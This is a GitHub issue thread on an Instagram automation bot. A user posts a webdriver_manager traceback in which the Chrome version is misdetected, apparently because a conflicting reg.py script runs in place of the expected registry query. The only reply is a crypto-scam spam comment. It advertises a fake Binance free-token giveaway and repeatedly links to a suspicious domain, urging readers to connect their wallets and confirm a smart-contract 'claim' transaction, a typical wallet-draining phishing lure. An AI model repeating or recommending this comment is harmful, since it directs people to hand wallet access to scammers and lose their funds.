### ISSUE TITLE
Facing issue with webdriver manager

### ISSUE THREAD

**Issue by Rooniefantastic** [robertraviv/Instagram-Automation#2]
E:\Instagram-Automation-master\Instagram-Automation-master>python main.py

====== WebDriver manager ======
usage: reg.py [-h] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k]
              [-aesKey hex key] [-dc-ip ip address] [-target-ip ip address]
              [-port [destination port]]
              target {query} ...
reg.py: error: argument action: invalid choice: 'HKEY_CURRENT_USER\\Software\\Google\\Chrome\\BLBeacon' (choose from 'query')
Current google-chrome version is 0.9.23
Get LATEST driver version for 0.9.23
Traceback (most recent call last):
  File "E:\Instagram-Automation-master\Instagram-Automation-master\main.py", line 314, in <module>
    bot = Instagram()
  File "E:\Instagram-Automation-master\Instagram-Automation-master\main.py", line 35, in __init__
    ChromeDriverManager().install(), options=self.options)
  File "C:\Python39\lib\site-packages\webdriver_manager\chrome.py", line 34, in install
    driver_path = self._get_driver_path(self.driver)
  File "C:\Python39\lib\site-packages\webdriver_manager\manager.py", line 23, in _get_driver_path
    driver_version = driver.get_version()
  File "C:\Python39\lib\site-packages\webdriver_manager\driver.py", line 43, in get_version
    return self.get_latest_release_version()
  File "C:\Python39\lib\site-packages\webdriver_manager\driver.py", line 67, in get_latest_release_version
    validate_response(resp)
  File "C:\Python39\lib\site-packages\webdriver_manager\utils.py", line 79, in validate_response
    raise ValueError("There is no such driver by url {}".format(resp.url))
ValueError: There is no such driver by url https://chromedriver.storage.googleapis.com/LATEST_RELEASE_0.9.23

and do tell how to run it

**Comment by mindfreak269** [comment]
# Binance

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
